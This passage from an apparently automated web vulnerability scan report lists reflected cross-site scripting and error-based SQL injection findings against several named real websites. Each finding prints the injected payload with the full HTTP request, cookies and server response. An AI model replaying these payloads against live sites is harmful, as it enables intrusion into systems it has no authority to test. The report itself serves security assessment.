homedepot.com;Expires=Tue, 05-Feb-2013 11:44:50 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228290414%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2caj34Bg8YGISVl2FazdtA1I3JSaA%3d;Domain=.homedepot.com;Path=/

{"ItemsAdded":[],"ItemsAddFailure":[{"CatEntryId":"2026429711f1ce<a b=c>5181cfdde58","ProductName":"1","ErrorMessage":"No Inventory"}]}

3.184. http://www.nutter.com/attorneys.php [AttorneyID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nutter.com
Path:	/attorneys.php

Issue detail

The value of the AttorneyID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a26fe%3balert(1)//7d55a336436 was submitted in the AttorneyID parameter. This input was echoed as a26fe;alert(1)//7d55a336436 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))a26fe%3balert(1)//7d55a336436 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:17 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22721

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a26fe;alert(1)//7d55a336436' at line 1 | 1064<BR>sql: SELE
...[SNIP]...
nt(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))a26fe;alert(1)//7d55a336436<br />
...[SNIP]...

3.185. http://www.nutter.com/attorneys.php [AttorneyID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.nutter.com
Path:	/attorneys.php

Issue detail

The value of the AttorneyID request parameter is copied into the HTML document as plain text between tags. The payload 6392f<a>47917628174 was submitted in the AttorneyID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attorneys.php?AttorneyID=6392f<a>47917628174 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:18 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 9075

error: Unknown column '6392f' in 'where clause' | 1054<BR>sql: SELECT FirstName,LastName,MiddleName,Suffix FROM attorneys WHERE AttorneyID=6392f<a>47917628174error: Unknown column '6392f' in 'where clause' | 1054<BR>
...[SNIP]...

3.186. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nutter.com
Path:	/attorneys.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4d9a1%3balert(1)//59aaeea385b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d9a1;alert(1)//59aaeea385b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit/4d9a1%3balert(1)//59aaeea385b+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22727

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/4d9a1;alert(1)//59aaeea385b 1))' at line 1 | 1064<BR>sql:
...[SNIP]...
count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit/4d9a1;alert(1)//59aaeea385b 1))<br />
...[SNIP]...

3.187. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 3946f<img%20src%3da%20onerror%3dalert(1)>50dc0b12049 was submitted in the cb parameter. This input was echoed as 3946f<img src=a onerror=alert(1)>50dc0b12049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=273436009418219&sg=1&pg=177302947267889&bx=true&vr=2.69&sc=search_rr&cu=&ct=&no=3&cb=r1eh3946f<img%20src%3da%20onerror%3dalert(1)>50dc0b12049&level1=&clk=&ur=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation%3FNs%3DP_REP_PRC_MODE%257C1%26storeId%3D10051%26catalogId%3D10053%26langId%3D-1&plk=202040831;202585948;202585928;202585946;202518949;202196193;202585926;100660300;202882859;202518947;202670069;202585943;202585924;202040828;202642980;202585939;202562705;202585922;202585937;202585919;100606995;202520255;100660307;202642976;&rf=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Navigation%3FstoreId%3D10051%26categoryID%3D556319%26langId%3D-1%26catalogId%3D10053%26cm_sp%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%26locStoreNum%3D2583 HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5fp3hk554qr2d1455wlr4u45; NSC_wjq-ipnfefqpu=ffffffffc3a01e4845525d5f4f58455e445a4a423660

Response

3.188. http://www.res-x.com/ws/r2/Resonance.aspx [clk parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The value of the clk request parameter is copied into the HTML document as plain text between tags. The payload 716aa<img%20src%3da%20onerror%3dalert(1)>48b0264970c was submitted in the clk parameter. This input was echoed as 716aa<img src=a onerror=alert(1)>48b0264970c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=273436009418219&sg=1&pg=572602011030539&bx=true&vr=2.69&sc=product_rr&ev=product&ei=202642971&cu=287408220&ct=&no=3&cb=r1eh&clk=716aa<img%20src%3da%20onerror%3dalert(1)>48b0264970c&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26productId%3D202642971%26R%3D202642971&plk=&rf=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26R%3D202642971%26catEntryId%3D202642971 HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay?langId=-1&storeId=10051&catalogId=10053&productId=202642971&R=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5fp3hk554qr2d1455wlr4u45; NSC_wjq-ipnfefqpu=ffffffffc3a01e4845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Thu, 16 Jun 2011 11:41:09 GMT
Content-Length: 3558

r1eh({"Resonance":{"Response":[{"scheme":"product_rr","display":"yes","output":"<div id=\"accessories\"><div id=\"add-ons\" class=\"col\"><div id=\"ymal_vert\"><div class=\"rounded-top-gray\"></div><h
...[SNIP]...
<a class=\"product-img-link\" href=\"/webapp/wcs/stores/servlet/BuildLinkToHomeDepot?linktype=product&id=202035131&MERCH=REC-_-
\tproduct-1-_-716aa<img src=a onerror=alert(1)>48b0264970c;202642971-_-202035131-_-N\">
...[SNIP]...

3.189. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload decb7<img%20src%3da%20onerror%3dalert(1)>fec95d5fcaf was submitted in the sc parameter. This input was echoed as decb7<img src=a onerror=alert(1)>fec95d5fcaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=273436009418219&sg=1&pg=177302947267889&bx=true&vr=2.69&sc=search_rrdecb7<img%20src%3da%20onerror%3dalert(1)>fec95d5fcaf&cu=&ct=&no=3&cb=r1eh&level1=&clk=&ur=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation%3FNs%3DP_REP_PRC_MODE%257C1%26storeId%3D10051%26catalogId%3D10053%26langId%3D-1&plk=202040831;202585948;202585928;202585946;202518949;202196193;202585926;100660300;202882859;202518947;202670069;202585943;202585924;202040828;202642980;202585939;202562705;202585922;202585937;202585919;100606995;202520255;100660307;202642976;&rf=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Navigation%3FstoreId%3D10051%26categoryID%3D556319%26langId%3D-1%26catalogId%3D10053%26cm_sp%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%26locStoreNum%3D2583 HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5fp3hk554qr2d1455wlr4u45; NSC_wjq-ipnfefqpu=ffffffffc3a01e4845525d5f4f58455e445a4a423660

Response

3.190. http://adnxs.revsci.net/imp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fed0'-alert(1)-'93da48fc56e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /imp?Z=300x250&s=1457934&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=1fed0'-alert(1)-'93da48fc56e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cJxPYkHXgOPSTi5CoyeFhnHJRt6fLr+1OVRdX4nuCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNuZhoCA==; rsiPus_bjrC="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbjeLhnxvCqNxuQAmHiwdDZ+f+xJ0E7g8jzc0DvGDoKVMLvpTHQqNyQHs6Exm0FAA/O2NUr6lEfJ7PQxE4W0VlVk6aXC4v9duVv1shaCwE0LAZ/Bx8Tb5hef+cEj3PLqxCnUQpfvYd7Vmm3clsezaQ3RSUGkvJtHdZ2YTGmaYEJUPbXW9WEH8qQzgpkYeDrPBH1U3bu+gJAgpsWhbrbPB62kbK9yKfTZIckBovzggyzOFwlJow83837Vp38X8J6UZ2pVRtPjL9j/uGFvaLASC9sca4eoyy1DiNYTbqM/IN0HsfsODfE/dlINqck0SuIicSHmxj6EAhObo6wIsaafDGE9dV8TyVXBo9Sr9044Ur/dRo2tn2Xw7pHX6mFkmzpuFbt1ZIR6ORC1hfMXvtKxQ3NpSyty5OFgEYkmuhKYFbFUB72lce0ts/ZWiQjV6smi6UujDfw6Yr0L1vMv1Jsna53BNhbvfJ2B08tqGXAV3vpJiDAtOJ0/CoKAPSG4e1qTnYvsLujwSsgeE/hpOstHVIZFS5jG7vOR0oYtjTMikoHR1Q1hjjKIZ/9TnXzaveyRGvBoaBt4YG3VTFSJEqIUtasV7CnjWTIvnlpWxDjc6OTo8BtlLw60LE4N3KdqbrpN0K7qAy76PhvFFYAgAbaPJNH8dXvCLCIdhJOcvm2UxwBWjcmnMmB5AjZu7tgCyGEuhEEv7sPyRc+T5nVtAYcxwHTY/H6RLgcJ7CdaBewn8gjUDrjMI6OTz2mrv6wPyDuIsIOVptpv8nTZRLacFpfvjcOnWQLZ+kMhecnNRPMgIoh+NU2sUuvyJTKBG9REg/P9a9MerxR8tW3Y5mWuZotrHq0vNX47iVAJI0Xlx0cvhd762Y2mq7CT8Mvbid9AIN5qqjJK1cuiKxnOvWrZ51MnAMQqA5UPUeoEZx75ArW3b7buDiQhQVw4CgF0cjOcMJqDqOQYGsqap8vpmJBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wqPPekz6i0ZtPjrDUo+cJIBfL1BlSYKc18etr